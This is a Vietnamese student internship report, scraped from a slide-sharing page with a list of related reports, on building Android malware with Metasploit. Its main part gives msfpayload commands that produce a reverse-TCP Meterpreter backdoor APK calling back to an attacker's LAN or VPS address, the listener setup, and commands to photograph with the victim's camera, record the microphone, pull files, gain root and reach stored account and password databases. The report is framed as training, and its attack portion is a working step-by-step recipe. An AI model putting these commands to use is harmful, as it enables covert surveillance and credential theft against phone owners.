- Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều 
hành Kali.Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta 
đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). 
- Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã 
dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng 
không phải cài lại mới hoàn toàn nữa 
5.2 Cài đặt Kali Linux trên máy ảo VMWare 
- Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài 
này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.6 64 bit. 
http://www.kali.org/downloads/
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể 
tìm trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo. 
- Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . 
Trên cửa sổ mới mở, chọn custom và nhấn next 
- Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó: 
Trang 25
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 26 
- Đặt tên và đặt đường dẫn cho máy ảo 
- Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định. 
- Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình 
thường... 
- Tiếp theo chọn Root password, luôn nhớ Root password đã chọn! 
Trang 27 
- Phần Partition chọn Guided – use entire disk và All files in one partition
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 28 
- Chọn Finish partitioning and write changes to disk
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 29 
- Chọn Yes
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 30 
- Nhấn continue để bắt đầu cài đặt khoảng 15 phút. 
- Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader.
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root 
và password đã đặt ở phần trước. 
- Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware 
Trang 31
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 32 
5.3 Tạo mã độc trên Kali Linux để xâm nhập Android 
- Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy 
android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy 
ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau: 
- Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware 
- Bấm vào Network Adapter và chọn Bridged: connection directly to the physical 
network 
- Bấm vào Edit -> Virtual Network Editor...
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- Trên phần Bridge (connect VMs directly to the external network) chọn adapter 
của máy thật 
Trang 33 
- Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android 
Đầu tiên mở terminal và gõ dòng lệnh
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 
Trang 34 
lport=8080 R > /root/Desktop/files.apk 
192.168.0.104là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem 
IP của máy Kali 
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng 
- Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một 
Metasploit reverse tcp backdoor.
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 35 
- Tiếp theo, gõ lệnh msfconsole 
- Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách 
gõ lệnh sau: 
use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên. 
set lport 8080– nhập port giống với port khi tạo payload ở trên. 
Exploit 
- Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- Thử với một máy Galaxy nexus giả lập, tải về files.apk, cài đặt và mở lên được giao 
diện như dưới, nhấp vào nút reverse_tcp: 
Trang 36
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau: 
Trang 37
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 38 
- Để xem thông tin về máy, nhập lệnh SysInfo 
 Sử dụng camera: 
Để xem danh sách camera, nhập webcam_list 
- Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh 
sách camera ở phần trước. Ví dụ như sau:
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của 
máy 
Trang 39 
 Ghi âm 
- Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 40 
 Lấy file từ sd card 
- Để vào sdcard, nhập lệnh :cd /sdcard và lệnh ls để xem danh sách file, thư mục 
- Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 41 
- Dùng lệnh cd /sdcard/Download để vào thư mục
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 42 
- Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh 
Download App.apk 
- Và file này sẽ được tải về thư mục root của máy Kali
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 43 
II. Thực hiện trên môi trường internet 
1.Cài mã độc trên VPS 
1.1 Gi ới thi ệu Metasploit lên VPS 
- Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, 
tấn công và khai thác lỗi của các service.Metasploit được xây dựng từ ngôn ngữ hướng 
đối tượng Perl, với những components được viết bằng C, assembler, và Python. 
Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. 
1.2 Cài đặt 
- Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community.Ta chọn 
phiên bản Community miễn phí và dùng cho nghiên cứu. 
-- 
- Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm 
khác. 
Chọn folder cài đặt:
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 44 
- Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: 
- Chọn server và ngày hết hạn, để mặc định:
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 45 
- Quá trình cài đặt của Metasploit: 
- Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 46 
- Sau khi Finish trình duyệt web mở lên và đi tới giao diện 
- Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào 
Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn 
Create Account:
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi 
miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License: 
Trang 47 
2.Từ VPS điều khiển thiết bị qua internet 
 Các bước thực hi ện 
1. Sử dụng Kali Linux để tạo file APK làm backdoor để 
hack vào Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 48 
- Chúng ta vẫn sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp 
lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk”ở đây địa chỉ VPS 
là 14.0.21.132 
2. Khởi động Metasploit Console trên VPS 
3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở 
phần trên, ở đây chỉ khác là sử dụng chính IP của VPS 
4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó 
sẽ bị hack
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
5. Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ 
Trang 49 
Để xem các lệnh ta gõ help 
Để xem thông tin về máy, nhập lệnh SysInfo 
Để xem các tác vụ đang chạy gõ ps 
Xem ip gõ ipconfig 
Xem danh sách thư mục, file gõ ls
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
• Sử dụng camera: 
- Để xem danh sách camera, nhập webcam_list 
- Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh 
sách camera ở phần trước. 
• Ghi âm 
- Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy 
• Lấy file từ sd card 
- Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục 
Trang 50 
Dùng lệnh cd /sdcard/Download để vào thư mục 
- Để tải về máy, ta nhập lệnh 
Download App.apk 
- Để upload gõ lệnh: upload 
Và file này sẽ được tải về thư mục root của máy Kali 
- Gõ shell để vào lệnh 
- Kiểm tra xem có root chưa gõ 
su 
whoami 
- Nếu báo unknown id is 0 tức là đã root 
ls -l danh mục file và các quyền 
cd để chuyển hướng thư mục 
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền 
/DATA 
/DATA/APP 
/DATA/SYSTEM 
/DATA/SYSTEM/accounts.db 
/DATA/SYSTEM/SYNC/accounts.xml 
/SYSTEM/APP/ 
- Để xem danh sách và down load các file hay thay đổi các file trong ROM 
+ Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập 
+ Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename 
Ví dụ chmod -R 777 /data
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 51 
^C để quay lại 
- Sử dụng SQLite để mở file db
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 52 
III. Tổng kết: 
Kết quả đạt được: 
Link “slideshare” và “youtube” 
Báo cáo tuần 1: 
- Link slideshare: http://www.slideshare.net/lanhle524/hng-dn-cai-t-kali-linux-trn-may-ao-vmwaredocx 
- Link youtube: https://www.youtube.com/watch?v=xk9q9yaiiXE&feature=youtu.be 
Báo cáo tuần 2: 
- Link slideshare: http://www.slideshare.net/lanhle524/tao-ma-c-trn-kali-linux-thm-nhp-android 
- Link youtube: https://www.youtube.com/watch?v=cswPjYZLhWU&feature=youtu.be 
Báo cáo tuần 3: 
- Link slideshare: http://www.slideshare.net/lanhle524/baibaocao3 
- Link youtube: https://www.youtube.com/watch?v=Nv4tesZKld0 
Báo cáo tuần 4: 
- Link slideshare: http://www.slideshare.net/lanhle524/baibaocao4-140810141923phpapp02 
- Link youtube: https://www.youtube.com/watch?v=yBFbKMYHsSI&feature=youtu.be 
Báo cáo giữa kì: 
- Link slideshare: http://www.slideshare.net/lanhle524/bao-cao-giua-ki-39850065 
Báo cáo cuối kì: 
- Link slideshare: 
Giới thiệu bản thân: 
- Link youtube: https://www.youtube.com/watch?v=TsgYFipDoyk&feature=youtu.be 
Thuận lợi – khó khăn: 
- Link youtube: https://www.youtube.com/watch?v=XQsUt8uZ1pU

More Related Content

What's hot

Báo cáo thực tập cuối kỳ - đàm văn sáng
Báo cáo thực tập cuối kỳ -  đàm văn sángBáo cáo thực tập cuối kỳ -  đàm văn sáng
Báo cáo thực tập cuối kỳ - đàm văn sángĐàm Văn Sáng
 
Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3
Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3
Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3phamvotuanthanh
 
Bao cao thuc tap gk
Bao cao thuc tap gkBao cao thuc tap gk
Bao cao thuc tap gkice_eyes
 
Bao cao gk
Bao cao gkBao cao gk
Bao cao gkice_eyes
 
Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]TranQuangChien
 
Báo cáo thực tập cuối kỳ - Phạm Tiến Quân
Báo cáo thực tập cuối kỳ   - Phạm Tiến QuânBáo cáo thực tập cuối kỳ   - Phạm Tiến Quân
Báo cáo thực tập cuối kỳ - Phạm Tiến QuânQuân Quạt Mo
 
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...Đàm Văn Sáng
 
104644 doan thuc quyen
104644   doan thuc quyen104644   doan thuc quyen
104644 doan thuc quyenLan Nguyễn
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tậptuankiet123
 
Baocao pham nguyendanghoang
Baocao pham nguyendanghoangBaocao pham nguyendanghoang
Baocao pham nguyendanghoangHoàng Phạm
 
Báo cáo thực tập làm website bằng Joomla
Báo cáo thực tập làm website bằng JoomlaBáo cáo thực tập làm website bằng Joomla
Báo cáo thực tập làm website bằng JoomlaThảo Trần
 
Phân tích công tác tuyển dụng nhân sự khối vận hành tại Công ty TNHH Minh Ph...
 Phân tích công tác tuyển dụng nhân sự khối vận hành tại Công ty TNHH Minh Ph... Phân tích công tác tuyển dụng nhân sự khối vận hành tại Công ty TNHH Minh Ph...
Phân tích công tác tuyển dụng nhân sự khối vận hành tại Công ty TNHH Minh Ph...hieu anh
 
bai bao cao thuc tap 2
bai bao cao thuc tap 2bai bao cao thuc tap 2
bai bao cao thuc tap 2Minh Hoang
 
Đề tài: Một số giải pháp nhằm hoàn thiện công tác quản trị nguồn nhân lực tại...
Đề tài: Một số giải pháp nhằm hoàn thiện công tác quản trị nguồn nhân lực tại...Đề tài: Một số giải pháp nhằm hoàn thiện công tác quản trị nguồn nhân lực tại...
Đề tài: Một số giải pháp nhằm hoàn thiện công tác quản trị nguồn nhân lực tại...Dịch vụ viết thuê Khóa Luận - ZALO 0932091562
 
Bao_cao_thuc_tap_athena_wordpress
Bao_cao_thuc_tap_athena_wordpressBao_cao_thuc_tap_athena_wordpress
Bao_cao_thuc_tap_athena_wordpressvngnhuhaiyen236
 
Báo cáo cuối kỳ
Báo cáo cuối kỳBáo cáo cuối kỳ
Báo cáo cuối kỳKhỉ Lùn
 

What's hot (19)

Báo cáo thực tập cuối kỳ - đàm văn sáng
Báo cáo thực tập cuối kỳ -  đàm văn sángBáo cáo thực tập cuối kỳ -  đàm văn sáng
Báo cáo thực tập cuối kỳ - đàm văn sáng
 
Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3
Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3
Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3
 
Bao cao thuc tap gk
Bao cao thuc tap gkBao cao thuc tap gk
Bao cao thuc tap gk
 
Bao cao gk
Bao cao gkBao cao gk
Bao cao gk
 
Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]
 
Báo cáo thực tập cuối kỳ - Phạm Tiến Quân
Báo cáo thực tập cuối kỳ   - Phạm Tiến QuânBáo cáo thực tập cuối kỳ   - Phạm Tiến Quân
Báo cáo thực tập cuối kỳ - Phạm Tiến Quân
 
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
 
104644 doan thuc quyen
104644   doan thuc quyen104644   doan thuc quyen
104644 doan thuc quyen
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tập
 
Baocao pham nguyendanghoang
Baocao pham nguyendanghoangBaocao pham nguyendanghoang
Baocao pham nguyendanghoang
 
Báo cáo thực tập làm website bằng Joomla
Báo cáo thực tập làm website bằng JoomlaBáo cáo thực tập làm website bằng Joomla
Báo cáo thực tập làm website bằng Joomla
 
Phân tích công tác tuyển dụng nhân sự khối vận hành tại Công ty TNHH Minh Ph...
 Phân tích công tác tuyển dụng nhân sự khối vận hành tại Công ty TNHH Minh Ph... Phân tích công tác tuyển dụng nhân sự khối vận hành tại Công ty TNHH Minh Ph...
Phân tích công tác tuyển dụng nhân sự khối vận hành tại Công ty TNHH Minh Ph...
 
NGHIEN CUU VA TRIEN KHAI VPN
NGHIEN CUU VA TRIEN KHAI VPN NGHIEN CUU VA TRIEN KHAI VPN
NGHIEN CUU VA TRIEN KHAI VPN
 
Thực tập
Thực tậpThực tập
Thực tập
 
bai bao cao thuc tap 2
bai bao cao thuc tap 2bai bao cao thuc tap 2
bai bao cao thuc tap 2
 
Baocaothuctapv1
Baocaothuctapv1Baocaothuctapv1
Baocaothuctapv1
 
Đề tài: Một số giải pháp nhằm hoàn thiện công tác quản trị nguồn nhân lực tại...
Đề tài: Một số giải pháp nhằm hoàn thiện công tác quản trị nguồn nhân lực tại...Đề tài: Một số giải pháp nhằm hoàn thiện công tác quản trị nguồn nhân lực tại...
Đề tài: Một số giải pháp nhằm hoàn thiện công tác quản trị nguồn nhân lực tại...
 
Bao_cao_thuc_tap_athena_wordpress
Bao_cao_thuc_tap_athena_wordpressBao_cao_thuc_tap_athena_wordpress
Bao_cao_thuc_tap_athena_wordpress
 
Báo cáo cuối kỳ
Báo cáo cuối kỳBáo cáo cuối kỳ
Báo cáo cuối kỳ
 

Similar to Bao cao cuoi li

Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập AthenaKhánh Trung Lý
 
Bao cao gk
Bao cao gkBao cao gk
Bao cao gkice_eyes
 
Bao cao giua ky
Bao cao giua kyBao cao giua ky
Bao cao giua kyice_eyes
 
BÁO CÁO THỰC TẬP - TRẦN VĂN ANH
BÁO CÁO THỰC TẬP - TRẦN VĂN ANHBÁO CÁO THỰC TẬP - TRẦN VĂN ANH
BÁO CÁO THỰC TẬP - TRẦN VĂN ANHtranvananh2407
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kìHai Te
 
Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014Seavar Neuvell
 
nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008Khanh Dinh
 
Báo cáo cuối kì
Báo cáo cuối kì Báo cáo cuối kì
Báo cáo cuối kì Hà Tiên Nhi
 
Báo cáo thực tập ATHENA
Báo cáo thực tập ATHENA Báo cáo thực tập ATHENA
Báo cáo thực tập ATHENA Ljck Cljck
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kìSteven Nguyễn
 
đạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minhđạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minhLoc Tran
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
BaocaothuctapcuoikyTrần Nam
 
Báo cáo thực tập cuối kì tô thị hường
Báo cáo thực tập cuối kì   tô thị hườngBáo cáo thực tập cuối kì   tô thị hường
Báo cáo thực tập cuối kì tô thị hườngHường Tô
 
Report ver1-140815234705-phpapp01
Report ver1-140815234705-phpapp01Report ver1-140815234705-phpapp01
Report ver1-140815234705-phpapp01bosua94
 
Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳthanhthong1210
 
baocaonguyenduykhanh
baocaonguyenduykhanhbaocaonguyenduykhanh
baocaonguyenduykhanhvanphu2103
 
Báo cáo thực tập cuối kỳ Nguyễn Minh Chương
Báo cáo thực tập cuối kỳ   Nguyễn Minh ChươngBáo cáo thực tập cuối kỳ   Nguyễn Minh Chương
Báo cáo thực tập cuối kỳ Nguyễn Minh Chươngmasternokizep
 

Similar to Bao cao cuoi li (20)

Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập Athena
 
Bao cao gk
Bao cao gkBao cao gk
Bao cao gk
 
Bao cao giua ky
Bao cao giua kyBao cao giua ky
Bao cao giua ky
 
BÁO CÁO THỰC TẬP - TRẦN VĂN ANH
BÁO CÁO THỰC TẬP - TRẦN VĂN ANHBÁO CÁO THỰC TẬP - TRẦN VĂN ANH
BÁO CÁO THỰC TẬP - TRẦN VĂN ANH
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
 
Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014
 
nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008
 
Báo cáo cuối kì
Báo cáo cuối kì Báo cáo cuối kì
Báo cáo cuối kì
 
Báo cáo thực tập ATHENA
Báo cáo thực tập ATHENA Báo cáo thực tập ATHENA
Báo cáo thực tập ATHENA
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
 
đạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minhđạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minh
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
Baocaothuctapcuoiky
 
Báo cáo thực tập cuối kì tô thị hường
Báo cáo thực tập cuối kì   tô thị hườngBáo cáo thực tập cuối kì   tô thị hường
Báo cáo thực tập cuối kì tô thị hường
 
Report ver1-140815234705-phpapp01
Report ver1-140815234705-phpapp01Report ver1-140815234705-phpapp01
Report ver1-140815234705-phpapp01
 
Báo cáo thực tập tại công ty bảo hiểm BIDV, hay
Báo cáo thực tập tại công ty bảo hiểm BIDV, hayBáo cáo thực tập tại công ty bảo hiểm BIDV, hay
Báo cáo thực tập tại công ty bảo hiểm BIDV, hay
 
Bao caothuctap nguyenthanhlam
Bao caothuctap nguyenthanhlamBao caothuctap nguyenthanhlam
Bao caothuctap nguyenthanhlam
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi ky
 
Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳ
 
baocaonguyenduykhanh
baocaonguyenduykhanhbaocaonguyenduykhanh
baocaonguyenduykhanh
 
Báo cáo thực tập cuối kỳ Nguyễn Minh Chương
Báo cáo thực tập cuối kỳ   Nguyễn Minh ChươngBáo cáo thực tập cuối kỳ   Nguyễn Minh Chương
Báo cáo thực tập cuối kỳ Nguyễn Minh Chương
 

Bao cao cuoi li

  • 1. TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN TP.HCM KHOA ĐIỆN TỬ VIỄN THÔNG BÁO CÁO ĐỀ TÀI THỰC TẬP ĐỀ TÀI : NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI  Nơi thực tập : TT.QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA GVHD : VÕ ĐỖ THẮNG SVTH : LÊ TRẦN XUÂN LÃNH MSSV : 1120085 TP.HCM -Tháng 10 / 2014
  • 2. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 1 LỜI CAM ĐOAN Em xin cam đoan:  Những nội dung trong báo cáo này là do em thực hiện dưới sự hướng dẫn trực tiếp của thầy Võ Đỗ Thắng.  Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả, tên công trình, thời gian, địa điểm công bố.  Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin chịu hoàn toàn trách nhiệm. TPHCM, ngày 25 tháng 09 năm 2014 Sinh viên thực tập Lê Trần Xuân Lãnh
  • 3. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 2 LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG Em xin chân thành cảm ơn trường đại học Khoa học tự nhiên và khoa Điện tử viễn thông đã chỉ dạy những kiến thức nền quý báu, tạo điều kiện cho em hoàn thành tốt đợt thực tập này.Đợt thực tập này đã giúp cho em đúc kết được rất nhiều kinh nghiệm cho bản thân. Những kinh nghiệm này sẽ giúp em hoàn thiện hơn trong công việc và môi trường làm việc sau này. Trong đợt thực tập này, em đã nỗ lực hết mình để có thể đạt được kết quả tốt nhất.Nhưng, bên cạnh đó chắc chắn em không thể tránh khỏi những thiếu sót nhất định.Em rất mong nhận được sự đóng góp, chia sẻ để em có thể làm tốt hơn nữa trong tương lai. Một lần nữa em xin chân thành cảm ơn. TPHCM, ngày 25 tháng 09 năm 2014 Sinh viên thực tập Lê Trần Xuân Lãnh
  • 4. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 3 LỜI CẢM ƠN TRUNG TÂM ATHENA Em xin gởi lời cảm ơn chân thành và sự tri ân sâu sắc đối với Thầy và các anh chị nhân viên đã tạo điều kiện cho em thực tập ở Athena để thực tập. Và em cũng xin chân thành cám ơn Thầy Võ Tất Thắng đã nhiệt tình hướng dẫn hướng dẫn em hoàn thành tốt khóa thực tập. Trong quá trình thực tập, cũng như là trong quá trình làm bài báo cáo, khó tránh khỏi sai sót, rất mong các Thầy bỏ qua. Đồng thời do trình độ lý luận cũng như kinh nghiệm thực tiễn còn hạn chế nên bài báo cáo không thể tránh khỏi những thiếu sót, em rất mong nhận được ý kiến đóng góp củaThầy để em học thêm được nhiều kinh nghiệm . Em xin chân thành cảm ơn ! Thầy Võ Đỗ Thắng (bên phải) cùng SVTT Lê Trần Xuân Lãnh (bên trái)
  • 5. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 4 NHẬN XÉT CỦA KHOA ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... TPHCM, ngày ... tháng ... năm 2014 Chủ nhiệm khoa
  • 6. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 5 ĐÁNH GIÁ CỦA GVHD: ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... ......................................................................................................................................................... TPHCM, ngày ... tháng ... năm 2014 Giá o viê n hướng dẫ n
